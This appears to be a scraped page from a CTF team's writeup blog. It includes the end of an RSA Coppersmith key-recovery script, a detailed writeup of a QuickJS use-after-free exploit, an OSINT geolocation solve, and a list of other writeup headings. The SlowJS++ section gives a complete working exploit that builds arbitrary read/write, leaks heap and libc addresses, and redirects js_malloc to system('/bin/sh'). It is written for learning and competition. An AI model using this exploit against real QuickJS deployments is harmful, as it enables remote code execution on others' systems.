
    # v is the first polynomial from our reduced lattice
    v = B[0] 
    
    # This section was lifted from the official solve, but just cleans up our polynomial
    Q = 0
    for (s, i) in enumerate(list(range(0, len(v), 2))):
        z = v[i] / (R_r^s) + v[i+1] / (R_i^s) * I
        Q += z * x^s

    return Q

R.<x> = PolynomialRing(I.parent(), "x") # sage once again doing its thing
f = x + a # our beloved polynomial

# 10 seemed to be the sweet spot
Q = coppersmith(f, 10^70, 10^68, N, k=10)

# r = x_0 = Q.roots()[0][0]
p = a + Q.roots()[0][0]


# Now we cast the values we calculated to GaussianRationals and find q
p = GaussianRational(Fraction(int(p.real())), Fraction(int(p.imag())))
N = GaussianRational(Fraction(int(N.real())), Fraction(int(N.imag())))
ciphertext = GaussianRational(Fraction(int(ciphertext.real())), Fraction(int(ciphertext.imag())))
q = N / p

# calculate the value of d from p and q
p_norm = int(p.real*p.real + p.imag*p.imag)
q_norm = int(q.real*q.real + q.imag*q.imag)
tot = (p_norm - 1) * (q_norm - 1)
e = 65537
d = pow(e, -1, tot)

# decrypt our ciphertext 
m = decrypt(ciphertext, (N, d))

# decode the message
print(long_to_bytes(int(m.real)) + long_to_bytes(int((m.imag))))

Flage

SDCTF{lll_15_k1ng_45879340409310} Indeed it is king.

Final Thoughts

This was a really hard challenge. I spent over 30 hours straight running in circles with various techniques like complex LLL and Algebraic LLL. However, I did not solve this challenge at the end of the CTF. In fact, this challenge went unsolved by anyone. After discussing with the author, I realized that one of my earlier ideas of converting the complex integers to a real matrix to do LLL was actually the intended solution. However, I didn’t quite understand how to complete the solve path which was doing a canonical embedding. An embedding is similar to what we did with using different columns for the real and imaginary part of the powers of $x$ and using the imaginary multiples.

I’m glad I was able to solve it regardless because it’s better late than never. More importantly, I hope that this guide can give you some understanding behind the complexities of the coppersmith method often needed for RSA challenges. In this vein, I have another section with resources I found useful for this challenge.

Finally, shoutout to 18lauey2 for making such a cool challenge.

Resources to help my dumb dumb brain

A bunch of lectures from Tanja Lange on Coppersmith and RSA as part of 2MMMC10 at Eindhoven University of Technology https://www.youtube.com/@tanjalangecryptology783/videos
The blog written by Cousin Wu Ka Lok from blackb6a https://www.klwu.co/maths-in-crypto/lattice-2/#second-idea
The paper the challenge was inspired by Ideal forms of Coppersmith’s theorem and Guruswami-Sudan list decoding
A wonderful paper that summarizes the various attacks on RSA. Recovering cryptographic keys from partial information, by example

That’s all folks.

[SDCTF 2024] SlowJS++

2024-05-15T00:00:00+00:00

Summary: Exploiting UAF due to an incorrect decrement to the reference count of an object in QuickJS Javascript engine to gain arbitrary read/write and leaks and then using that to gain RCE.

Intro

SlowJS++ was a Javascript engine exploitation challenge in SDCTF 2024, with only 2 solves during the competition. I could not solve it before the end of the CTF, but I kept working on the exploit and I finally solved it about 10 hours after the end.

We were given the challenge binary, which was a recent version of QuickJS Javascript engine compiled with debug info, and told that it was being hosted on Ubuntu 23.10 in the remote environment. I downloaded the libc, libm, and ld for Ubuntu 23.10 and patched the binary to use those. The challenge also had a hint that said we should bindiff the async_func_resume function.

QuickJS Internals

This challenge is about async functions and promises in Javascript. I found this, this, and this very helpful in understanding the javascript concepts. Also, this writeup was particularly helpful in understanding a bit more about QuickJS internals.

1. JSValue

QuickJS represents JSValues as two qwords. The first one is the value (in case of int/double/etc.) or the pointer (for heap objects), and the second qword is a tag that shows the type of the first qword. The tags can be found here. The negative tag values are for objects that are managed by the heap and the garbage collector. The zero and positive tags are for objects that are not allocated separately on the heap, and are represented with their direct value (such as int, double, undefined, etc.). You can look at the different structs used by QuickJS both by looking at the source code and by opening the challenge binary in gdb and using ptype /ox .

2. JSString

The JSString struct represents a string, and it can be inspected with ptype /ox JSString in gdb:

type = struct JSString {
/* 0x0000      |  0x0004 */    JSRefCountHeader header;
/* 0x0004: 0x0 |  0x0004 */    uint32_t len : 31;
/* 0x0007: 0x7 |  0x0001 */    uint8_t is_wide_char : 1;
/* 0x0008: 0x0 |  0x0004 */    uint32_t hash : 30;
/* 0x000b: 0x6 |  0x0001 */    uint8_t atom_type : 2;
/* 0x000c      |  0x0004 */    uint32_t hash_next;
/* 0x0010      |  0x0000 */    union {
/*                0x0000 */        uint8_t str8[0];
/*                0x0000 */        uint16_t str16[0];
                                   /* total size (bytes):    0 */
                               } u;
                               /* total size (bytes):   16 */
                             }

Basically, there’s some metadata, including the length of the string, in the first 16 bytes, and then from offset 16 the array of string bytes will start (str8). So, the content of the string is not stored in a separate buffer and is stored at the end of the JSString object itself.

3. JSObject

The JSObject struct represents a generic javascript object in memory. You can see that each object has a gc header, and the first dword of the header is the reference count for the garbage collector. Another important thing about objects is their class_id, which shows the type of that object. Different class id values can be seen here. JSObjects also have two fields called shape and prop. shape points to a JSShape struct that describes the shape of an object and the properties that it has (similar to a map in v8), and the prop field is a pointer to an array of JSProperty structs that each hold the data for one of the properties of our object.

Two important objects to learn about are ArrayBuffers and TypedArrays:

An ArrayBuffer object is a JSObject that has a pointer to a JSArrayBuffer struct instance in its obj.u.array_buffer field. The JSArrayBuffer struct has a pointer to its backing storage memory (the actual data buffer) called data and a few other fields like the length.
A TypedArray is a kind of array that allows the user to use an array buffer’s storage for different types. For example, a Uint32Array as a typed array that has an array buffer inside itself and uses that array buffer as an array of 32-bit integers. The important fields in a JSObject of a typed array are obj.u.array.u1.typed_array, obj.u.array.u.ptr, and obj.u.array.count. The typed_array field has a pointer to a JSTypedArray struct, which itself has a field called obj that points back at the JSObject of our typed array, and has another pointer called buffer that points to a JSObject representing the array buffer behind this typed array. the ptr and count fields in a typed array object represent the pointer to the backing storage of the array buffer behind this typed array (where the actual “data” is stored), and the length of the array. So, if ta_obj is the JSObject of our typed array, ta_obj.u.array.u.ptr and ta_obj.u.array.u1.typed_array->buffer->u.array_buffer->data both point to the backing storage memory of the array, but the first one is way more convenient so the ptr and count fields inside the typed array object itself are the ones that are used when accessing different indexes of the array. You can look at the source code of JS_SetPropertyValue() to see how this is done.

Another important thing to note about array buffers and typed arrays is that the JSArrayBuffer and JSTypedArray structs have next and prev fields inside their struct list_head fields that form a double-linked list. This double linked list will connect an array buffer with all typed arrays that use that array buffer as their storage buffer. The js_array_buffer_finalizer function here has a for-each loop that when an array buffer gets freed, goes through all typed arrays that use this array buffer and sets the count field of those typed arrays to zero. So, the approach in the writeup I mentioned earlier for a TCTF 2021 challenge does not work any more, because if you cause a UAF for an array buffer, you can no longer use typed arrays previously connected to it to read/write memory from its freed backing storage, as the count field of those typed arrays gets set to zero.

Debugging

A debugging approach that was mentioned in the TCTF writeup by r3kapig was to use Math.min(obj) and break on the js_math_min_max function in gdb, and then inspect the pointer at *$r8 or argv->u.ptr after hitting the breakpoint to find the address of obj. I also used this approach for debugging and it was really helpful.

Vulnerability

I downloaded the source for the latest version of QuickJS from https://github.com/bellard/quickjs/tree/d378a9f3a583cb787c390456e27276d0ee377d23 (this is the latest commit at the time of the CTF) and built an original QuickJS binary with debug info to achieve something similar to the challenge binary. Opening both binaries in Ghidra and comparing the async_func_resume function, you can see that the challenge binary will decrease the reference count on the object returned by an async function, and if that reference count reaches zero it will free the object with __JS_FreeValueRT (given that the object has a negative tag value, which means that it is managed by the gc). This is probably the inlined version of the JS_FreeValueRT function here, which does the same thing. So, an object that is returned from an async function gets its refcount decreased by 1 when it shouldn’t have been decreased. So, if we can cause the refcount of an object to become zero and get the object freed while we still keep the reference to that object in our source, we can cause a UAF situation.

lVar3 = *(long *)(param_2 + 0xa0);
uVar4 = *(undefined8 *)(lVar3 + -8);
piVar5 = *(int **)(lVar3 + -0x10);
*(undefined (*) [16])(lVar3 + -0x10) = (undefined  [16])0x0;
*(undefined8 *)(lVar3 + -8) = 3;
// if the object has a negative tag (heap object) and (--refcount <= 0):
if ((0xfffffff4 < (uint)uVar4) && (iVar1 = *piVar5, *piVar5 = iVar1 + -1, iVar1 + -1 < 1)) {
  __JS_FreeValueRT(*(undefined8 *)(param_1 + 0x18),piVar5);	// free the object
}

Using the Math.min(obj) debug approach to inspect the reference count of some objects after they’re created, you can see that their reference count is 1 more than the expected value. For example, an object with only 1 reference to it has a refcount of 2. This is also something mentioned in the TCTF challenge writeup, and I don’t understand the reason for this either. I also think this might be because of some additional internal reference to the object in the engine.

Getting arbitrary read/write

I wrote an async function that returned the object arr, where arr is a globally-defined Uint32Array. I normally expected that after calling fn1() once and returning from it, arr is freed and the UAF is triggered. However, for some reason it appears that we need to call it twice to have arr get freed. I don’t clearly understand the reason for this and found this with a bit of trial and error and playing around with the initial PoC code. Also, it appeared that if the first Math.min(arr) call (between the fn1() calls; the one marked with // ???) is not there, arr will not get freed somehow. However, when the exploit is completed, commenting that Math.min call did not break the exploit. I assume this might have something to do with the garbage collector being invoked at different times in these situations, but I don’t understand this clearly either. The good thing is that although the garbage collector and the general heap layout of the application is not very predictable and causes weird issues like this, it is deterministic so it won’t change between different runs of the same js code, and we can tweak some stuff to make the issues caused by them go away.

var arr = new Uint32Array(0x140);
...
async function fn1() {
	console.log("fn1");
	return arr;
}
...
fn1().then(() => {
	Math.min(arr) // ???
	fn1().then(() => {
		Math.min(1);	// arr gets freed here, but we still have the reference to it.
	});
});

Now if we break after the second fn1() call, we can see that arr is freed and is in the malloc free lists. by inspecting the free lists (tcahce/fastbins) we can see that we need to allocate a few more objects to bring arr’s freed memory to the top of the free lists. We use a for loop to perform some allocations for this. All JSObject structs are allocated using 0x50-sized chunks, so allocating new objects on the heap will use the same free list as arr’s JSObject chunk:

objs = [];
for (let i = 0; i < 6; i++) {
	objs.push({a: 1});
}

The for loop is allocating 6 new objects and pushing them into some array to keep their references and prevent them from being freed. However, the number of iterations of the loop (6) is not always the same and changes weirdly because of the side effects of other parts of the code on the heap layout and gc operations. I had to change this value from 6 to 7 and vice versa serveral times during the exploit development process. You just have to look at the heap tcahce/fastbins layout at the breakpoint before this code segment to determine the number of iterations of this loop.

Now we want to allocate another Uint32Array, but this time we want its ptr field (which points to the actual data storage memory for the array) to point to the same chunk of memory that used to hold the JSObject struct for arr. Therefore, since JSObject structs are allocated in 0x50-sized chunks, it is necessary that the data size of our new array causes the allocation of an 0x50-sized chunk. So, we want our array’s data memory to have a size of 0x48, which means 18 4-byte integers. So, we will define uaf_arr as:

uaf_arr = new Uint32Array(18);

The allocation of this new typed array causes 3 malloc calls that should return an 0x50-sized chunk. The first one is to host the JSObject of the ArrayBuffer behind this typed array. The second one is to host the backing storage memory of the array (the one that we want to collide with arr’s object struct), and the third one is for the JSObject of the typed array itself. So, we want arr’s freed memory to be the second chunk from the beginning of tcache before we instantiate uaf_arr to ensure that uaf_arr’s data pointer points to it. We need to adjust the number of allocated objects in the previous for loop to meet this requirement. We can do a Math.min(uaf_arr) right after this line to break and see if everything went as we wanted. uaf_arr’s data pointer (ptr field) must point to the same memory that hosted arr’s JSObject struct.

Now, we can write into uaf_arr and edit the object metadata of arr as we wish:

// set fake object metadata for 'arr'
uaf_arr[0] = 10;		// large refcount to prevent it from being freed by the gc later
uaf_arr[1] = 0x001b0d00;	// class_id of Uint32Array and some flags similar to what uaf_arr has
uaf_arr[0x10] = 0x10000000;	// a huge length value (the .u.array.count field of JSObject)

Now we can point arr’s data pointer (.u.array.u.ptr field) to any arbitrary location by editing its value through uaf_arr and then read/write that location by accessing arr[0]. However, we don’t have any kind of leak yet so we don’t know what address to write there. The memory of uaf_arr is also zeroed out when its re-allocated, so we can’t find any pointers there.

Getting leaks

In order to get leaks I did the same thing that we did to arr, but this time to a string. If we can cause a JSString to be freed and then allocate a Uint32Array whose data pointer points to the JSString struct memory, we can manipulate the length of the JSString and set it to some huge value, and then we can have oob read on the heap through that string.

var str = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ";	// a JSString that occupies an 0x50-sized chunk
...
async function fn2() {
	console.log("fn2");
	return str;
}
...
fn1().then({
	fn1().then({
		...
		// do stuff related to causing UAF for 'arr'
		...
		fn2().then({
			fn2().then({
				// 'str' gets freed here while we still have a reference to it.

				// allocate more objects to bring str's freed memory near the top of tcachebin
				for (let i = 0; i < 6; i++) {
					objs.push({a: 1});
				}

				// allocate a typed array with its data pointer pointing to str's freed memory (freed JSString struct)
				var uaf_str_arr = new Uint32Array(18);

				// set metadata of the JSString struct
				uaf_str_arr[0] = 2;	// large refcount to avoid it getting freed by gc
				uaf_str_arr[1] = 0x10000000;	// huge length
				uaf_str_arr[2] = 0x497f93b1;	// some metadata I copied from original 'str'
				uaf_str_arr[3] = 0x4b;			// some metadata I copied from original 'str'
				
				...
			});
		});
	});
});

This has the exact same process as exploiting arr. You just have to adjust the size of the initial content of str so that its JSString struct is allocated in an 0x50-sized chunk, so allocating {a: 1} objects will allocate from the same malloc freelist as it.

Now that we can read stuff from the heap, I wrote a helper function to read a dword from the heap:

const read_dword = (offset) => {
	let result = 0;
	for (let i = 3; i >= 0; i--) {
		result = (result << 8) | str.charCodeAt(offset + i);
	}
	return result;
};

Then, I set a breakpoint and used tel gdb command to inspect the pointers that come after str’s buffer on the heap. I could find a pointer with a constant offset from libc base and another pointer with a constant offset from heap base. I used these to leak libc and heap base.

Getting RCE

The JSContext *ctx that gets passed as the first argument to many js functions has a field named rt which is a pointer to JSRuntime. JSRuntime also has a field JSMallocFunctions mf, and another one JSMallocState malloc_state. mf has 4 function pointers, the first of which is js_malloc. Its signature shows that the first argument to it is a JSMallocState *. So, if we can overwrite the ctx->rt->mf.js_malloc function pointer with system() and we can write "/bin/sh" at &(ctx->rt->malloc_state), we will be able to call system("/bin/sh") by triggering js_malloc. Just before doing that, I set the shape field of arr’s object metadata to point to the middle of some area near the base of the heap that seemed to contain just zero. This will prevent segfaults in an inline function find_own_property called by JS_SetPropertyInternal, which is the function used for writing to an index of arr. In the end, allocating any object will trigger js_malloc and give us a shell. This is the final part of the exploit:

// leak the heap base low and high dwords by reading them from the heap
let heap_base_high = read_dword(0x54);
let heap_base_low = read_dword(0x50) - 0xd60;
console.log(heap_base_high.toString(16));
console.log(heap_base_low.toString(16));

// set the 'shape' property of 'arr' to the middle of an area with zeros.
// this will prevent segfaults in find_own_property which is an inlined function called
// by JS_SetPropertyInternal when performing writes to an index of arr
uaf_arr[6] = heap_base_low + 0x200;
uaf_arr[7] = heap_base_high;

// set the data pointer of arr to point to the heap base
uaf_arr[0xe] = heap_base_low;
uaf_arr[0xf] = heap_base_high;

// leak (main_arena+96), which is a libc address, by reading it off the heap
let libc_leak_low = read_dword(0x100);
let libc_leak_high = read_dword(0x104);
console.log(libc_leak_high.toString(16));
console.log(libc_leak_low.toString(16));

// Math.min(uaf_arr);

// set ctx->rt->mf->js_malloc to system()
arr[0xa8] = libc_leak_low - 0x1a9a50;	// libc-dependant offset
arr[0xa9] = libc_leak_high;

// write "/bin/sh\0" at ctx->rt->malloc_state's location, which gets passed to js_malloc as the first argument
arr[0xb0] = 0x6e69622f;
arr[0xb1] = 0x0068732f;

// trigger js_malloc, which will now do system("/bin/sh")
var x = {a: 1};

Something that I’ve just found out at the time of writing this writeup and commenting my exploit is that even writing too many comments in the exploit code can mess up the heap layout and make the exploit not work. This is probably expected because the JS source code seemed to get allocated on the heap as well, so changing the source code size too much might have effects on the heap layout and break the exploit. Basically, it’s very fragile but at least it’s deterministic :)

Full exploit

And the full final exploit code:

var arr = new Uint32Array(0x140);
var str = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ";
var uaf_arr;
var objs;

async function fn1() {
	console.log("fn1");
	return arr;
}

async function fn2() {
	console.log("fn2");
	return str;
}

fn1().then(() => {
	fn1().then(() => {
		objs = [];
		for (let i = 0; i < 6; i++) {
			objs.push({a: 1});
		}

		uaf_arr = new Uint32Array(18);

		uaf_arr[0] = 10;
		uaf_arr[1] = 0x001b0d00;
		uaf_arr[0x10] = 0x10000000;

		fn2().then(() => {
			fn2().then(() => {
				for (let i = 0; i < 6; i++) {
					objs.push({a: 1});
				}

				var uaf_str_arr = new Uint32Array(18);

				uaf_str_arr[0] = 2;
				uaf_str_arr[1] = 0x10000000;
				uaf_str_arr[2] = 0x497f93b1;
				uaf_str_arr[3] = 0x4b;

				const read_dword = (offset) => {
					let result = 0;
					for (let i = 3; i >= 0; i--) {
						result = (result << 8) | str.charCodeAt(offset + i);
					}
					return result;
				};

				let heap_base_high = read_dword(0x54);
				let heap_base_low = read_dword(0x50) - 0xd60;
				console.log(heap_base_high.toString(16));
				console.log(heap_base_low.toString(16));

				uaf_arr[6] = heap_base_low + 0x200;
				uaf_arr[7] = heap_base_high;

				uaf_arr[0xe] = heap_base_low;
				uaf_arr[0xf] = heap_base_high;

				let libc_leak_low = read_dword(0x100);
				let libc_leak_high = read_dword(0x104);
				console.log(libc_leak_high.toString(16));
				console.log(libc_leak_low.toString(16));

				arr[0xa8] = libc_leak_low - 0x1a9a50;
				arr[0xa9] = libc_leak_high;

				arr[0xb0] = 0x6e69622f;
				arr[0xb1] = 0x0068732f;

				var x = {a: 1};
			});
		});
	});
});

The flag: sdctf{i_PrOMlse_7heRe_1S_n0_UniN7end3D_SOlu7i0n_tHl5_tImE}

[UMDCTF 2024] Lost on Caladan

2024-05-01T00:00:00+00:00

Lost on Caladan [500] OSINT

Challenge Description

you seek to find the finest doctor on caladan. it’s rumored he works at this location. find his name for me.

Solution

As a Dune enthuaist, who has seen both films half a dozen times, I know that the finest doctor on Caladan is Dr. Yueh. However, the ctf server did not accept the flag UMDCTF{Wellington_Yueh}. Nonetheless, we were provided with a .jpg file of a certain google street view (360 degress full panoramic view)

From here, we are given an image of a Google StreetView of a supposedly medical center.

Lets try to find cues to identify macro details of the location i.e. country, administrative division such as provinces, states, cities, etc.

With the glarring white on red stop octogon being the ‘Stop Sign’ , we can tell that is based in North America, specifcally in an English speaking territory. Québec, being the uniquely French speaking province in Canada, have French signages of ‘arrêt’. We can rule out the possibility of it being in Québec.

Additoinally, we can see the detailed high-visibility direction signs near the entrance/exit of the parking lot. In North America, as medical centers often span multiple buildings, clear and concise directions are necessary. They are also presented in high contrast colors (blue and white or red and white) for high visibility. Additionally, there are arrows to point the way at intersections.

We can conclude that this is located at a fairly largel medical center in the region. Possibly with more than 300+ beds and attached with out-patient, emergency, rehabilitation, and surgical facilities.

Now lets look for some other identifiers.

The newstand by the entrance of the building may provide some insight. Only the “amp” is visble in this newspaper or megazine dispenser.

We can initially conclude that “amp” matches the megazine “Arkansas Money & Politics” which is a local Arkansas publication. This should help us narrow down the search to Arkansas, USA. However, given the scope of the state

Baptist Health Medical Center - Little Rock (834 Beds)
CHI St. Vincent Infirmary (615 Beds)
UAMS Medical Center (535 Beds)

Source .

The satellite view of Baptist Health Medical Center - Little Rock shows a similar parking lot layout and the same high-visibility direction signs.

The parking lot layout and the high-visibility direction signs (white on dark blue) are similar to the ones in image.

Zooming in on Google Street View, we can select an intersection that fit in our criteria of being near a large parking lot and a medical tower.

The beige building on the right is rather interesting, as it is accros from a parking lot and matches the color of the building in the image.

Aha we’ve reached our destination, where a minibus is parked at the front and where the latest issues of Arkansas Money & Politics are available.

“Baptist Eye Center”, is a surgical opthamology center affiliated with Baptist Health Medical Center - Little Rock. Doctors at this center should be the people we are looking for.

Heading over on WebMD we can see a list of ophanmologists working at the center.

We took the name ‘best’ doctor literally, as we initially tried to submit the flags containing the names of the highest rated doctors, such as as UMDCTF{Christian_Cardell_Hester}. It was not until after nearly 15 minutes of bruting through all of the doctors names that we realized the zero star rated “Dr. Sean Adonis Atreides.”

UMDCTF{Sean_Adonis_Atreides} unfortunately was not his full name. We scrambled to find the full name of the doctor, and going on Oklahoman Board of Medical Licensure and Supervision, we found that his full name is “Sean Paul Adonis Atreides”.

Flag

UMDCTF{Sean_Paul_Adonis_Atreides}

CTF @ UBC

A primer on Attack Defense CTFs

Introduction and Target Audience

Flavours of CTFs

Attack-Defense CTFs

Game Duration & Ticks

The Game Network & Your Vulnbox

VPNs, vulnbox setup and whatnot

Services

King of The Hill (KotH)

Scoring Points

The Gameserver

Attacking Services, Attack Info and Flag stores

Defending Services and Patching

the Service Level Agreement (SLA)

The Secret Other Thing: Network Traffic Analysis

Flag submission

AD Infrastructure

Throwers

PCAP Analyzers

Patcher

Anything you find useful :D

An Important Conclusion

Resources

[FAUST 2024] Patching infrastructure for attack-defense CTFs

Design

Configuration

[TFCCTF 2024] Santa’s Little Helper

Challenge

First Attempt: compiling C

The smallest ELFs?

A little detour to the 64ELF header and Program Header (Ph) table

Trick 1: Header overlay

The shortest x86 shellcode?

Trick 2: Program header and .text overlay

Trick 3: Store data within the ELF header

Solve script

[corCTF 2024] digest-me

Challenge

It’s too big

Brute force?

Reversing the elephant in the room

Failing with z3

The next day

Vectorization is OP

Two stupid bugs

Final thoughts

[UIUCTF 2024] Picoify (500)

Problem Description

Analysis

The Compressor

The Decompressor

Conclusion

[R3CTF/YUANHENGCTF-2024] Transit

R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]

TL;DR

Challenge Description

The Image

Solution

Flag

[NahamCon CTF 2024] Helpful Desk

Problem Description

Initial Research

Exploring the codebase

Decompiling

HelpfulDesk-new.dll

HelpfulDesk-old.dll

Exploit

[SDCTF 2024] ReallyComplexProblem

Problem Description

Attachments

TL;DR

Introduction, audience, and pre-requisites

Challenge Overview and Inspecting the Code

But we’re missing bits! Now what?

A Copper sword crafted by the kingdom’s finest blackSmith

The Coppersmith Attack is truly one of the attacks of all time

The Howgrave-Graham Theorem

Reducing the Size of our Massive Polynomials

A Trick to Create Unlimited Polynomials

Trick 2: Program header and `.text` overlay